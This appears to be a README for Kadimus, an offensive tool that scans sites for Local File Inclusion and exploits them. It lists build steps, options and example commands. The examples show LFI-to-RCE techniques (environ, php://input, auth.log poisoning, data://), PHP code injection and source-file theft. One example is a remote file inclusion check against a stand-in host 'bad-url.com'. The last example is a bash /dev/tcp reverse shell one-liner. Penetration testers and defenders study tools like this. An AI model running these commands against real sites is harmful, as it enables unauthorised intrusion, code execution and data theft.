Kadimus - Local File Inclusion (LFI) Scan & Exploit Tool

Kadimus is a tool that allows you to detect and exploit the Local File Inclusion (LFI) vulnerability in sites.

Features:

  • Check all url parameters
  •  /var/log/auth.log RCE
  •  /proc/self/environ RCE
  •  php://input RCE
  •  data://text RCE
  •  Source code disclosure
  •  Multi thread scanner
  •  Command shell interface through HTTP Request
  •  Proxy support (socks4://, socks4a://, socks5:// ,socks5h:// and http://)
  •  Proxy socks5 support for bind connections


Compile:

$ git clone https://github.com/P0cL4bs/Kadimus.git
$ cd Kadimus
You can run the configure file:
./configure
Or follow this steps:

Installing libcurl:

  • CentOS/Fedora:
# yum install libcurl-devel
  • Debian based:
# apt-get install libcurl4-openssl-dev
  • Mac OS X based:
$ brew install openssl

Installing libpcre:

  • CentOS/Fedora:
# yum install pcre-devel
  • Debian based:
# apt-get install libpcre3-dev
  • Mac OS X based:
$ brew install pcre

Installing libssh:

  • CentOS/Fedora:
# yum install libssh-devel
  • Debian based:
# apt-get install libssh-dev
  • Mac OS X based:
$ brew install libssh

And finally:

$ make

Options:

  -h, --help                    Display this help menu


  Request:

    -B, --cookie STRING         Set custom HTTP Cookie header

    -A, --user-agent STRING     User-Agent to send to server

    --connect-timeout SECONDS   Maximum time allowed for connection

    --retry-times NUMBER        number of times to retry if connection fails

    --proxy STRING              Proxy to connect, syntax: protocol://hostname:port


  Scanner:

    -u, --url STRING            Single URI to scan

    -U, --url-list FILE         File contains URIs to scan

    -o, --output FILE           File to save output results

    --threads NUMBER            Number of threads (2..1000)


  Explotation:

    -t, --target STRING         Vulnerable Target to exploit

    --injec-at STRING           Parameter name to inject exploit

                                (only need with RCE data and source disclosure)


  RCE:

    -X, --rce-technique=TECH    LFI to RCE technique to use

    -C, --code STRING           Custom PHP code to execute, with php brackets

    -c, --cmd STRING            Execute system command on vulnerable target system

    -s, --shell                 Simple command shell interface through HTTP Request


    -r, --reverse-shell         Try spawn a reverse shell connection.

    -l, --listen NUMBER         port to listen


    -b, --bind-shell            Try connect to a bind-shell

    -i, --connect-to STRING     Ip/Hostname to connect

    -p, --port NUMBER           Port number to connect

    --b-proxy STRING            IP/Hostname of socks5 proxy

    --b-port NUMBER             Port number of socks5 proxy


    --ssh-port NUMBER           Set the SSH Port to try inject command (Default: 22)

    --ssh-target STRING         Set the SSH Host


    RCE Available techniques

      environ                   Try run PHP Code using /proc/self/environ

      input                     Try run PHP Code using php://input

      auth                      Try run PHP Code using /var/log/auth.log

      data                      Try run PHP Code using data://text


    Source Disclosure:

      -G, --get-source          Try get the source files using filter://

      -f, --filename STRING     Set filename to grab source [REQUIRED]

      -O FILE                   Set output file (Default: stdout)

Examples:

  • Scanning:
./kadimus -u localhost/?pg=contact -A my_user_agent
./kadimus -U url_list.txt --threads 10 --connect-timeout 10 --retry-times 0
  • Get source code of file:
./kadimus -t localhost/?pg=contact -G -f "index.php%00" -O local_output.php --inject-at pg
  • Execute php code:
./kadimus -t localhost/?pg=php://input%00 -C '<?php echo "pwned"; ?>' -X input
  • Execute command:
./kadimus -t localhost/?pg=/var/log/auth.log -X auth -c 'ls -lah' --ssh-target localhost
  • Checking for RFI:
You can also check for RFI errors, just put the remote URL on resource/common_files.txt and the regex to identify this, example:
/* http://bad-url.com/shell.txt */
<?php echo base64_decode("c2NvcnBpb24gc2F5IGdldCBvdmVyIGhlcmU="); ?>
in file:
http://bad-url.com/shell.txt?:scorpion say get over here
  • Reverse shell:
./kadimus -t localhost/?pg=contact.php -Xdata --inject-at pg -r -l 12345 -c 'bash -i
>& /dev/tcp/127.0.0.1/12345 0>&1' --retry-times 0


Download Kadimus

